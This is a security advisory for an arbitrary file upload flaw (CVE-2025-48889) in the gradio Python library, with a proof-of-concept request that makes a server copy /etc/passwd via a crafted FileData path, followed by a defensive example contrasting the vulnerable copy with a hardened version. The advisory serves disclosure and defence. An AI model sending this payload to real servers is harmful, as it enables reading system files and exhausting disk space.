Arbitrary File Upload Affecting gradio package, versions [,5.31.0)


Severity

medium (CVSS assessment by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.61% (45th percentile)

  • Snyk ID: SNYK-PYTHON-GRADIO-10265012
  • published: 30 May 2025
  • disclosed: 29 May 2025
  • credit: jjjutla, nkoorty

Introduced: 29 May 2025

CVE-2025-48889
CWE-434

How to fix?

Upgrade gradio to version 5.31.0 or higher.

Overview

gradio is a Python library for easily interacting with trained machine learning models.

Affected versions of this package are vulnerable to Arbitrary File Upload through the shutil.copy operation in the FileData._copy_to_dir() method: the path of a client-supplied FileData object is passed to shutil.copy without validation. By sending specially crafted requests to the /gradio_api/run/predict endpoint, an attacker can make the server copy large or system-critical files, exhausting disk resources and disrupting server operations.

PoC

import requests

# Placeholder for the URL of the Gradio app under test; the prediction
# endpoint named in the advisory is appended to it.
url = "https://[your-gradio-app-url]/gradio_api/run/predict"
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"
}

# A FileData object whose "path" names a file already present on the server
# (here /etc/passwd) instead of a file the client uploaded; the declared
# "orig_name" and "size" are arbitrary and are not what the server checks.
payload = {
    "data": [
        {
            "path": "/etc/passwd",
            "url": "[your-gradio-app-url]",
            "orig_name": "network_config",
            "size": 5000,
            "mime_type": "text/plain",
            "meta": {
                "_type": "gradio.FileData"
            }
        },
        {}
    ],
    "event_data": None,
    "fn_index": 4,       # function index and trigger id depend on the particular app
    "trigger_id": 11,
    "session_hash": "test123"
}

response = requests.post(url, headers=headers, json=payload)
print(f"Status Code: {response.status_code}")
print(f"Response Body: {response.text}")
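The following is an added example, not code from gradio or from the advisory, illustrating the Overview's point and the PoC above from the defender's side: it places a function that trusts the client-supplied "path" field (the pattern the advisory describes) beside a hardened variant that confines the source file to an upload root the server controls, resolves symlinks before that check, and bounds the real on-disk size rather than the client-declared "size". Function names (copy_to_dir_unchecked, copy_to_dir_checked, RejectedUpload, demo), the upload_root/max_bytes parameters and the files it creates in a temporary directory are all assumptions made for the illustration; the FileData dict is shaped like the one in the PoC payload.

```python
import shutil
import tempfile
from pathlib import Path

# Assumed cap for the example; a real deployment would pick its own limit.
MAX_UPLOAD_BYTES = 10 * 1024 * 1024


class RejectedUpload(ValueError):
    """Raised when a FileData object does not refer to an acceptable file."""


def copy_to_dir_unchecked(file_data: dict, dest_dir: Path) -> Path:
    """The pattern the advisory describes: the client-controlled "path"
    field is handed to shutil.copy as-is, so any file readable by the
    server process can be copied into dest_dir."""
    src = Path(file_data["path"])
    dest = dest_dir / src.name
    shutil.copy(src, dest)
    return dest


def copy_to_dir_checked(file_data: dict, dest_dir: Path, upload_root: Path,
                        max_bytes: int = MAX_UPLOAD_BYTES) -> Path:
    """Hardened variant (hypothetical, not gradio's fix): only regular files
    that the server itself placed under upload_root may be copied. Symlinks
    are resolved before the containment check, and the size is read from
    the file on disk, never from the client-declared "size" field."""
    root = upload_root.resolve()
    real = Path(file_data["path"]).resolve()  # follows symlinks
    if root not in real.parents:
        raise RejectedUpload(f"source outside upload root: {file_data['path']}")
    if not real.is_file():
        raise RejectedUpload(f"source is not a regular file: {file_data['path']}")
    actual_size = real.stat().st_size
    if actual_size > max_bytes:
        raise RejectedUpload(f"source too large: {actual_size} bytes")
    dest_dir.mkdir(parents=True, exist_ok=True)
    dest = dest_dir / real.name
    shutil.copy(real, dest)
    return dest


def _file_data(path: Path) -> dict:
    """Build a FileData dict shaped like the one in the PoC payload."""
    return {"path": str(path), "orig_name": path.name, "size": 5000,
            "mime_type": "text/plain", "meta": {"_type": "gradio.FileData"}}


def _rejected(call) -> bool:
    """True if the call is refused with RejectedUpload."""
    try:
        call()
    except RejectedUpload:
        return True
    return False


def demo() -> dict:
    """Constructed scenario in a temporary directory: a file outside the
    upload root (standing in for /etc/passwd), a legitimate upload, a
    symlink that escapes the root, and an oversized upload."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        upload_root = base / "uploads"
        cache = base / "cache"
        upload_root.mkdir()
        cache.mkdir()

        outside = base / "secret.txt"  # constructed stand-in for a system file
        outside.write_bytes(b"root:x:0:0:root:/root:/bin/sh\n")
        allowed = upload_root / "a.txt"
        allowed.write_bytes(b"hello")
        big = upload_root / "big.bin"
        big.write_bytes(b"\0" * 2048)
        link = upload_root / "link.txt"
        link.symlink_to(outside)

        # Unchecked: the file outside the upload root is copied (the flaw).
        results["unchecked_copies_outside"] = copy_to_dir_unchecked(
            _file_data(outside), cache).exists()

        # Checked: the legitimate upload goes through, the rest is refused.
        kwargs = {"dest_dir": cache, "upload_root": upload_root, "max_bytes": 1024}
        copied = copy_to_dir_checked(_file_data(allowed), **kwargs)
        results["checked_copies_allowed"] = copied.read_bytes() == b"hello"
        results["outside_rejected"] = _rejected(
            lambda: copy_to_dir_checked(_file_data(outside), **kwargs))
        results["symlink_rejected"] = _rejected(
            lambda: copy_to_dir_checked(_file_data(link), **kwargs))
        results["oversize_rejected"] = _rejected(
            lambda: copy_to_dir_checked(_file_data(big), **kwargs))
    return results


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The containment test uses the resolved path's parents rather than a string prefix, so a path like /srv/uploads-old/x does not pass as being under /srv/uploads, and resolving before the check is what stops a symlink planted inside the upload root from pointing back out of it.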
